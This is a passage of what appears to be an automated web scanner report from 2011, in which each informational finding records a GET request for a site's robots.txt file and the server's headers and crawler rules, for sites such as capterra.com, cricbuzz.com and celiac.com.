HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:28:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 12 Jul 2010 22:22:50 GMT
ETag: "2fc805c-130-48b3831656280"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.102. http://www.capterra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capterra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.capterra.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:35:51 GMT
Content-Type: text/plain
Connection: close
ETag: "4adf1c66-f2-1100a10"
Last-Modified: Wed, 21 Oct 2009 14:36:22 GMT
Content-Length: 242

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
30.103. http://www.carfolio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carfolio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carfolio.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:02:02 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Mon, 01 Nov 2010 17:27:51 GMT
ETag: "7aa002-2b9-4940120ae13c0"
Accept-Ranges: bytes
Content-Length: 697
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=691200
Expires: Tue, 10 May 2011 00:02:02 GMT
Vary: Accept-Encoding
Connection: close

#
User-agent: grub-client
Disallow: /specifications/

User-agent: *
Disallow: /diary/

User-agent: *
Disallow: /mail/

User-agent: *
Disallow: /classifieds/

User-agent: *
Disallow: /rt3/

User-agent:
...[SNIP]...
30.104. http://www.carsforagrand.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carsforagrand.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carsforagrand.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:07:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 16 Aug 2010 15:33:05 GMT
ETag: "f0c58-dd-48df28c762e40"
Accept-Ranges: bytes
Content-Length: 221
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *

Disallow: /listing/
Disallow: /detail/
Disallow: /edetail/
Disallow: /ebay.php
Disallow: /zipRSS.php
Disallow: /vin.php
Disallow: /links/
Disallow: /mail/

Sitemap: http://www.carsforag
...[SNIP]...
30.105. http://www.cato-at-liberty.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cato-at-liberty.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cato-at-liberty.org

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:36:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://www.cato-at-liberty.org/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.cato-at-liberty.org/sitemap.xml.gz
30.106. http://www.cbs8.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs8.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbs8.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9f2"
Cteonnt-Length: 818
Expires: Mon, 02 May 2011 00:40:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:40:25 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...
30.107. http://www.celebridiot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebridiot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebridiot.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:53 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 01:09:53 GMT
Connection: close
Content-Type: text/plain

#######################################################
# iRobots.txt SEO

# All Bots
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /re
...[SNIP]...
30.108. http://www.celebtna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebtna.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebtna.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:27 GMT
Server: WebServerX
Last-Modified: Wed, 20 Apr 2011 07:28:48 GMT
ETag: "116878-172-4a15493552c00"
Accept-Ranges: bytes
Content-Length: 370
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.celebtna.com/Sitemap.xml
Disallow: /pictures/Paula_Nielsen-56706.jpg
Disallow: /pictures/Paula_Nielsen-43881.jpg
Disallow: /Brandi-Ann_Milbradt.htm
User-agent: *
Disa
...[SNIP]...
30.109. http://www.celebzilla.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebzilla.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebzilla.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:25 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Wed, 13 Apr 2011 17:29:45 GMT
ETag: "4f291da-c2-4a0d0279bb440"
Accept-Ranges: bytes
Content-Length: 194
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /join.php
Disallow: /admin/
Disallow: /sextapes.php
Disallow: /loader.php
Disallow: /getlaid.php
Disallow: /categories/
Disallow: /index.php?r=video&id
Allow: /
30.110. http://www.celiac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celiac.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celiac.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:01 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Sat, 09 Apr 2011 20:39:46 GMT
ETag: "934001-873-4a08257cba880"
Accept-Ranges: bytes
Content-Length: 2163
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /celiac_test
Disallow: /articlerss
Disallow: /authors/forgotpass
Disallow: /blogrss
Disallow: /tmp
Disallow: /attachments
Disallow: /cache
Disallow: /newsrss
Disallow: /newsrss
...[SNIP]...
30.111. http://www.cellreception.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cellreception.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cellreception.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:05:20 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Wed, 24 Feb 2010 23:10:51 GMT
ETag: "680b8-cc-c70434c0"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: TurnitinBot
Disallow: /
User-agent: ia_archiver
Disallow: /
User-agent: Mediapartners-Google*
Disallow:
User-agent: YahooYSMcm*
Disallow:

User-agent: *
Disallow: /images/
Disallow: /input
...[SNIP]...
30.112. http://www.cfigroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cfigroup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cfigroup.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 08 Sep 2008 14:06:46 GMT
Accept-Ranges: bytes
ETag: "5613e520bc11c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:22 GMT
Connection: close
Content-Length: 48

User-agent: *
Disallow: /resources/whitepapers/
30.113. http://www.cheapism.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapism.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheapism.com

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8b
Vary: Accept-Encoding
Last-Modified: Fri, 04 Sep 2009 15:19:47 GMT
Content-Type: text/plain
Content-Length: 24
Date: Mon, 02 May 2011 00:15:41 GMT
X-Varnish: 1487206803 1487206799
Age: 1
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow:
30.114. http://www.chicoer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chicoer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chicoer.com

Response

HTTP/1.0 200 OK
Content-Length: 114
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 22:15:35 GMT
Accept-Ranges: bytes
ETag: "80ddf411a16ca1:3020"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 00:50:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 00:50:38 GMT
Connection: close

User-agent: *
Disallow: /portlet/
Disallow: /circare/
Crawl-delay: 5

Sitemap: http://www.chicoer.com/sitemap.xml
30.115. http://www.chrisbrownworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chrisbrownworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chrisbrownworld.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 20 Jan 2011 19:04:20 GMT
ETag: "30017b-9f6-49a4bcd093500"
Accept-Ranges: bytes
Content-Length: 2550
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:18:12 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.116. http://www.christnotes.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christnotes.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.christnotes.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 26 Oct 2005 01:44:46 GMT
ETag: "19b802b-4b-403fe66ac7f80"
Accept-Ranges: bytes
Content-Length: 75
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /style/
Disallow: /style-new/
Disallow: /-/amzn.asp
30.117. http://www.cirrusimage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cirrusimage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cirrusimage.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:29 GMT
Server: Apache
Last-Modified: Fri, 01 Oct 2010 14:06:46 GMT
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

30.118. http://www.classfinders.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classfinders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classfinders.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:43:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 21 Oct 2010 14:39:43 GMT
ETag: "5405f-a5-493217f2249c0"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: text/plain

Sitemap: http://www.classfinders.com/sitemap.xml

User-agent: *
Disallow: /people/
Disallow: /search/
Disallow: /results/
Disallow: /ex/
Disallow: /ref_ad.php
30.119. http://www.clickinks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickinks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clickinks.com

Response

HTTP/1.1 200 OK
Content-Length: 440
Content-Type: text/plain
Content-Location: http://www.clickinks.com/robots.txt
Last-Modified: Fri, 08 Oct 2010 10:31:28 GMT
Accept-Ranges: bytes
ETag: "528286f7d366cb1:40a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:49:24 GMT
Connection: close

...User-agent: *
Disallow: /Articles/images
Disallow: /3DSecure
Disallow: /EmailGeneration
Disallow: /GoogleCheckout
Disallow: /PayPalExpressCheckout
Disallow: /PopUps
Disallow: /scripts
Disal
...[SNIP]...
30.120. http://www.connectamarillo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connectamarillo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.connectamarillo.com

Response

HTTP/1.0 200 OK
Content-Length: 587
Content-Type: text/plain
Content-Location: http://www.connectamarillo.com/robots.txt
Last-Modified: Wed, 10 Dec 2008 17:34:11 GMT
Accept-Ranges: bytes
ETag: "f7125d83ed5ac91:12bd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sun, 01 May 2011 23:38:12 GMT
Connection: close

User-agent: *
Disallow: /cms/
User-agent: *
Disallow: /includes/
User-agent: *
Disallow: /styles/
User-agent: *
Disallow: /xmlfiles/
User-agent: *
Disallow: /workarea/
User-agent: *
Disallo
...[SNIP]...
30.121. http://www.convergedirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.convergedirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.convergedirect.com

Response

HTTP/1.1 200 OK
Content-Length: 275
Content-Type: text/plain
Last-Modified: Wed, 27 Apr 2011 16:13:38 GMT
Accept-Ranges: bytes
ETag: "16fb2d11f64cc1:2c0a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:26:07 GMT
Connection: close

User-agent: *
Disallow: /js/
Disallow: /flashy/
Disallow: /administration/
Disallow: /hartfordvideointro.shtml/
Disallow: /hartfordvideosample.shtml/
Disallow: /._flashy/
Disallow: /._flashy.cs
...[SNIP]...
30.122. http://www.copygator.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.copygator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.copygator.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:03 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Last-Modified: Tue, 20 Jan 2009 22:07:05 GMT
ETag: "c60c8e-17b3-49764b09"
Accept-Ranges: bytes
Content-Length: 6067
Connection: close
Content-Type: text/plain


User-agent: aipbot
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: AISearchBot
Disallow: /

User-agent: Alexibot
Disallow: /

User-agent: Aqua_Products
Disallow: /

User
...[SNIP]...
30.123. http://www.cosmeticscop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cosmeticscop.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Mar 2010 00:28:05 GMT
Accept-Ranges: bytes
ETag: "9afbeb7b1c0ca1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=4e704cc5-b001-4a6a-b5ff-d2aa9c1b6247; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Connection: close
Content-Length: 34

User-agent: *
Disallow: /staging/
30.124. http://www.countrytabs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.countrytabs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.countrytabs.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/plain
Last-Modified: Sat, 06 Sep 2008 08:03:46 GMT
Accept-Ranges: bytes
ETag: "11ba2a16f7fc91:285"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:31:20 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /if/
Disallow: /ads/
Disallow: /mail/
Disallow: /upload/
Disallow: /members/
Disallow: /_scripts/
Disallow: /contact.asp
Disallow: /admin/
Disallow
...[SNIP]...
30.125. http://www.coupondad.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupondad.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coupondad.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:01 GMT
Server: Apache
Last-Modified: Sun, 13 Feb 2011 23:01:04 GMT
Accept-Ranges: bytes
Content-Length: 728
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-
Disallow: /search
Disallow: /category
Disallow: /tag
Disallow: /author
Disallow: /trackback
Disallow: /*trackback
Disallow: /*trackback*
Disallow: /*/tr
...[SNIP]...
30.126. http://www.craftjr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craftjr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craftjr.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Vary: Cookie
X-Pingback: http://www.craftjr.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
30.127. http://www.craigslistfoundation.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craigslistfoundation.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craigslistfoundation.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:03:48 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 00:29:04 GMT
ETag: "39f8091-16-49f0754d9f400"
Accept-Ranges: bytes
Content-Length: 22
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
30.128. http://www.crankyape.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crankyape.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 May 2011 23:41:46 GMT
Content-Length: 881
Content-Type: text/plain
Last-Modified: Sat, 03 Apr 2010 09:40:29 GMT
Accept-Ranges: bytes
ETag: "d45941b211d3ca1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

# robots.txt for http://www.crankyape.com
User-agent: *
Allow: /
Disallow: /aspnet_client/
Disallow: /ASPSpellCheck/
Disallow: /CO/
Disallow: /company/
Disallow: /DebugFile/
Disallow: /dotnet
...[SNIP]...
30.129. https://www.crankyape.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crankyape.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:53:39 GMT
Content-Length: 881
Content-Type: text/plain
Last-Modified: Sat, 03 Apr 2010 09:40:29 GMT
Accept-Ranges: bytes
ETag: "d45941b211d3ca1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

# robots.txt for http://www.crankyape.com
User-agent: *
Allow: /
Disallow: /aspnet_client/
Disallow: /ASPSpellCheck/
Disallow: /CO/
Disallow: /company/
Disallow: /DebugFile/
Disallow: /dotnet
...[SNIP]...
30.130. http://www.creativekidsathome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creativekidsathome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creativekidsathome.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:22 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 12 Jan 2007 16:35:41 GMT
ETag: "38010dc-a0-7c8a3140"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

User-agent: ShopWiki
Disallow: /
User-agent: *
Disallow: /activities/images/
Disallow: /cgi-bin/
Disallow: /downloads/
Disallow: /images/
Disallow: /samples/


30.131. http://www.creditunionsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditunionsonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditunionsonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 22:51:56 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Tue, 05 Oct 2010 16:05:36 GMT
ETag: "df44cd-cf-491e0d4d0d400"
Accept-Ranges: bytes
Content-Length: 207
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.creditunionsonline.com/

User-agent: *
Disallow: /cgi-bin/    # keep outta the cgi
Disallow: /scripts/
Disallow: /static/
Sitemap: http://www.creditunionsonline.com/sitemap_in
...[SNIP]...
30.132. http://www.crengland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crengland.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crengland.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:01 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_jk/1.2.26 PHP/5.2.9-2
Last-Modified: Tue, 03 Jun 2008 20:38:35 GMT
ETag: "2000000060b29-97-44ec918a88a89"
Accept-Ranges: bytes
Content-Length: 151
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /etools/driverapp/
Disallow: /etools/
Disallow: /errors/
Disallow: /metatags/
Disallow: /etools/job/
Disallow: /webapp/
30.133. http://www.cricbuzz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cricbuzz.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:08:23 GMT
Content-Type: text/plain
Content-Length: 5504
Last-Modified: Wed, 30 Jun 2010 11:55:18 GMT
Connection: close
cbz_srvr: garner.cricbuzz.com
Accept-Ranges: bytes

# Cricbuzz - The Interactive Cricket Portal
# Nothing very exciting here for you I'm afraid.
# Despictable and evil robots to keep out :)
User-agent: grub-client
Disallow: /

User-agent: grub
Disallo
...[SNIP]...
30.134. http://www.cumminsforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cumminsforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cumminsforum.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:03 GMT
Server: Apache
Last-Modified: Wed, 15 Aug 2007 01:36:43 GMT
Accept-Ranges: bytes
Content-Length: 1032
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forums/ajax.php
Disallow: /forums/attachment.php
Disallow: /forums/calendar.php
Disallow: /forums/cron.php
Disallow: /forums/editpost.php
Disallow: /forums/global.php
Disallow
...[SNIP]...
30.135. http://www.cupcakesandcashmere.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cupcakesandcashmere.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cupcakesandcashmere.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Vary: Cookie
Content-Type: text/plain; charset=utf-8
Date: Sun, 01 May 2011 23:55:50 GMT
X-Pingback: http://cupcakesandcashmere.com/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-kcnkeakg=4F92A620E285AF2FF435559955FD9FBF; path=/

User-agent: *
Disallow:
Sitemap: http://cupcakesandcashmere.com/sitemap.xml.gz
30.136. http://www.dailynewnowa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailynewnowa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailynewnowa.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:07 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php
30.137. http://www.dallasguns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dallasguns.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dallasguns.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 03 Jan 2011 22:10:11 GMT
ETag: "1ca58e-80-498f86a6296c0"
Accept-Ranges: bytes
Content-Length: 128
Connection: close
Content-Type: text/plain

# robots.txt formated following http://www.robotstxt.org/robotstxt.html guidelines
User-agent: *
Allow: /
Disallow: /cgi-bin/
30.138. http://www.dells.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dells.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dells.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:51:13 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 01 Jun 2010 20:49:19 GMT
ETag: "cb58a-658-487fe1b75f1c0"
Accept-Ranges: bytes
Content-Length: 1624
Cache-Control: max-age=1209600
